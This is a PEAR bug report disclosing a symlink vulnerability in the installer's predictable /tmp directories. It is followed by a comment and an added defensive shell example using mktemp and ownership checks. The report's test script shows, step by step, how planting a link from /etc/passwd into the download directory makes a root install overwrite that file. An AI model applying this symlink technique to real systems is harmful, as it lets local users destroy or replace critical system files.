Edit report at https://pear.php.net/bugs/bug.php?id=18055&edit=1

  ID: 18055
  Comment by: math.parent@gmail.com
  Reported By: ondrej@sury.org
  Summary: [SECURITY]: Symlink attack
  Status: Duplicate
  Type: Bug
  Package: PEAR
  Operating System: Linux
  Package Version: 1.9.1
  PHP Version: 5.3.3
  Roadmap Versions:
  New Comment:

Hello,

This bug is marked as duplicate. But duplicate of what?


Previous Comments:
------------------------------------------------------------------------

[2010-11-15 23:41:09] dufuz

-Status: Open
+Status: Duplicate


------------------------------------------------------------------------

[2010-11-14 15:24:37] ondrej

Description:
------------
There's a symlink vulnerability when doing PEAR install. PEAR
should really be using $(mktemp) for its directories like
download_dir, cache_dir and tmp_dir, and check whether the
directory doesn't exist.

Test script:
---------------
# pear config-show | grep /tmp
PEAR Installer cache directory cache_dir /tmp/pear/cache
PEAR Installer download download_dir
/tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory temp_dir /tmp/pear/temp

# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17
/tmp/buildd/php5-5.3.3/pear-build-download

# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout

# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://pear.php.net/Net_Socket-1.0.10


# head /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.9.1" version="2.0"
xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
  <name>Net_Socket</name>
  <channel>pear.php.net</channel>
  <summary>Network Socket Interface</summary>
  <description>Net_Socket is a class interface to TCP sockets. It
provides blocking
   and non-blocking operation, with different reading and writing modes
   (byte-wise, block-wise, line-wise and special formats like network
   byte-order ip addresses).</description>
  <lead>


Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.

Actual result:
--------------
Overwritten /etc/passwd just by creating the right directories and
symlinks.

------------------------------------------------------------------------
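
The checks the report asks for (an mktemp-created directory, a test of any pre-existing directory, and no writes through a planted link), sketched as an added shell example. This is not PEAR's code and not part of the report; the function names safe_workdir, dir_is_trusted and safe_write and the pear-work.* template are hypothetical.

```shell
#!/bin/sh
# Added example; helper names are hypothetical, not part of PEAR.

# Create a private working directory with an unpredictable name.
# mktemp -d creates it atomically with mode 0700 and fails if the name exists.
safe_workdir() {
    base=${1:-${TMPDIR:-/tmp}}
    mktemp -d "$base/pear-work.XXXXXXXXXX"
}

# Succeed only if DIR is a real directory (not a symlink), owned by the
# current user, and not writable by group or others.
dir_is_trusted() {
    dir=$1
    [ -d "$dir" ] && [ ! -L "$dir" ] && [ -O "$dir" ] || return 1
    # ls -ld mode string: character 6 is group write, character 9 is other write.
    case $(ls -ld "$dir") in
        d????-??-?*) return 0 ;;
        *) return 1 ;;
    esac
}

# Write stdin to DIR/NAME, refusing to reuse anything already at that path.
safe_write() {
    dir_is_trusted "$1" || { echo "untrusted directory: $1" >&2; return 1; }
    target=$1/$2
    # -L also catches dangling symlinks, which -e reports as absent.
    if [ -e "$target" ] || [ -L "$target" ]; then
        echo "refusing to write, path exists: $target" >&2
        return 1
    fi
    # noclobber makes '>' refuse an existing regular file and create new
    # files exclusively, narrowing the window between the check and the open.
    ( set -C; cat > "$target" )
}
```

Run as root against the download_dir shown in the report, dir_is_trusted would fail because the directory is owned by another user.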

Posted to pear-bugs (pear.php.net) Oct 20, '15 at 4:14a